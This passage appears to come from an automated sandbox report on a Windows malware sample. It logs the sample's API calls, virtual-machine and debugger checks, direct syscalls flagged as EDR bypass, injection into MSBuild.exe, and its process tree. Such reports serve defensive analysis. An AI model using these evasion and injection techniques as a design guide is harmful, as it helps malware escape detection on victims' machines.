File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040B610 GetDateFormatA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C86261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	2_2_6C86261E

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Code function: 1_2_00401120 GetSystemInfo,ExitProcess,

1_2_00401120

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48913
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59087
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58976
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 50915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58163
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57941
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56661
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57606
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57493
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40637
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 46596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56151
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38067
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31695
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55817
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55295
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31647
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54945
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 51976
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55255
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54163
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53822
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 53604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 38506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local\Temp\u42w.2	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	File opened: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Jump to behavior

Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWA1`
Source: MSBuild.exe, 00000010.00000002.2886557359.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: g77dRQ1Csm.exe, 00000000.00000003.1743305315.0000000004A4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 07500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: QEMU_HARDU
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: u42w.3.exe, 00000005.00000003.2040498563.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: g77dRQ1Csm.exe, 00000000.00000002.1898621096.0000000003019000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960219517.00000173F894D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Full
Source: g77dRQ1Csm.exe, 00000000.00000002.1900142864.0000000004A05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API call chain: ExitProcess graph end node	graph_1-96197
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API call chain: ExitProcess graph end node	graph_1-95151
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API call chain: ExitProcess graph end node	graph_1-95154
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API call chain: ExitProcess graph end node	graph_1-95172
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API call chain: ExitProcess graph end node	graph_1-95165
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API call chain: ExitProcess graph end node	graph_1-95204
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	API call chain: ExitProcess graph end node	graph_1-95180
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

Code function: 2_2_007FD15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

2_2_007FD15B

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

1_2_00416240

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_02F6766B push dword ptr fs:[00000030h]	0_2_02F6766B
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315092B mov eax, dword ptr fs:[00000030h]	0_2_0315092B
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03150D90 mov eax, dword ptr fs:[00000030h]	0_2_03150D90
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03163C4E mov eax, dword ptr fs:[00000030h]	0_2_03163C4E
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]	1_2_00415DC0

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_0315A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0315A125
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_031609A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_031609A2
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03159E6D SetUnhandledExceptionFilter,	0_2_03159E6D
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: 0_2_03159CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_03159CDA
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00419DC7 SetUnhandledExceptionFilter,	1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C03B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6C03B66C
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C03B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C03B1F7
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6CA1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6CA1AC62
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_007FC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_007FC1FD
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_00806678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00806678
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C942782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C942782
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: 2_2_6C9490E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C9490E9

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	NtSetInformationThread: Direct from: 0x6C85617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	NtSetInformationThread: Direct from: 0x6C0E617C
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	NtQuerySystemInformation: Direct from: 0x6F5BE4
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A821000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F23008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A821000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E6A008

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.0.exe "C:\Users\user\AppData\Local\Temp\u42w.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Process created: C:\Users\user\AppData\Local\Temp\u42w.3.exe "C:\Users\user\AppData\Local\Temp\u42w.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
